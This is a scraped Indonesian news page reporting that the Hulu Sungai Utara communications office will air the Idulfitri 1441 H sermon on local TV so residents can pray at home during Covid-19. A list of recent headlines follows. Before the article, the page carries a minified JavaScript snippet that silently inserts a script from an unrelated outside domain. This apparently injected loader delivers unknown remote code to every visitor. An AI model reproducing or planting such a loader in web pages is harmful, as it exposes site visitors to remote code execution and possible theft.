(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: Kanal

Diskominfo HSU Siarkan Khutbah Idulfitri 1441 H di TV Lokal


KANALKALIMANTAN.COM, AMUNTAI – Meski ada imbauan pelaksanaan sholat Idulfitri 1441 H di rumah masing-masing, Dinas Komunikasi dan Informatika (Dikominfo) Kabupaten Hulu Sungai Utara (HSU) meyakinkan masyarakat HSU tidak perlu khawatir untuk dapat menyimak khutbah khusus melalui televisi lokal Kominfo di rumah.

Hal ini dilakukan sebagai bentuk upaya pencegahan Covid-19 di kabupaten HSU sesuai arahan pemerintah dan MUI agar masyarakat dapat melaksanakan salat Id di rumahnya masing-masing saja, di samping dapat menyimak khutbah Idulfitri dari ketua MUI Kabupaten HSU.

“Kami beritahukan kepada masyarakat HSU yang melaksanakan salat Idulfitri di rumah bisa mengikuti khutbah salat Idulfitri 1441H, Minggu 24 mei 2020 pukul 08.00 Wita melalui TV kominfo disampaikan oleh ketua MUI kabupaten HSU,” ujar Kepala Diskominfo HSU H Adi Lesmana kepada kanalkalimantan.com, Sabtu (23/5/2020)

Dia mengharapkan melalui siaran TV Kominfo ini dapat membantu kelancaran pelaksanaan ibadah Idulfitri dengan memutus rantai Covid-19.

Ketua MUI HSU KH Said Masrawan Lc mengatakan khutbah melalui siaran TV ini dilakukan sebagai pengganti khutbah yang awam biasa dilakukan, khususnya untuk para warga HSU yang melaksanakan sholat Ied dirumah.

Terlebih, katanya, kondisi pandemi Covid-19 yang masih berlangsung hingga melalui MUI juga telah mengeluarkan Fatwanya, yakni Fatwa Majelis Ulama Indonesia nomor 28 tahun 2020 tanggal 13 Mei 2020 terkait tentang Panduan Kaifiat Takbir dan Salat Idulfitri Saat Pandemi Covid-19 tertanda Prof DR H Hasanuddin. AF. (kanalkalimantan.com/dew)

 

Reporter : Dew
Editor : Dhani

 


Desy Arfianty

Recent Posts

Buka Rapat Kerja, Ini Harapan Bunda PAUD Kabupaten Banjar

KANALKALIMANTAN.COM, MARTAPURA – Bunda PAUD Kabupaten Banjar Hj Nurgita Tiyas membuka Rapat Kerja (Raker) di… Read More

12 menit ago

Saat Sasirangan dan Soto Banjar jadi Perbincangan Pelajar di Taiwan

KANALKALIMANTAN.COM, BANJARBARU - Sejumlah aspek dalam budaya Banjar menjadi topik hangat di sela pengabdian internasional… Read More

24 menit ago

Pemkab Kapuas Bahas PPKH Permukiman Transmigrasi Lokal Ngaju Bersinar

KANALKALIMANTAN.COM, KUALA KAPUAS - Pemerintah Kabupaten (Pemkab) Kapuas melakukan pembahasan terhadap Persetujuan Penggunaan Kawasan Hutan… Read More

1 jam ago

Pelatihan AI Ready ASEAN: AI Itu Alat Pendukung, Bukan Pengganti Manusia

KANALKALIMANTAN.COM, BANJARMASIN - Masyarakat Anti Fitnah Indonesia (MAFINDO) Kalimantan Selatan kembali menggelar implementasi pelatihan AI… Read More

2 jam ago

Uang Bonus Atlet Kontingen Banjarmasin Dipangkas, Ini Penyebabnya

KANALKALIMANTAN.COM, BANJARMASIN - Bonus atlet dan pelatih Banjarmasin peraih medali pada Pekan Olahraga Provinsi (Porprov)… Read More

2 jam ago

2 Jenis Lead Generation untuk Menarik Prospek Berkualitas

KANALKALIMANTAN.COM - Menawarkan produk atau layanan yang bagus adalah kewajiban bisnis, namun itu saja tidak… Read More

3 jam ago

This website uses cookies.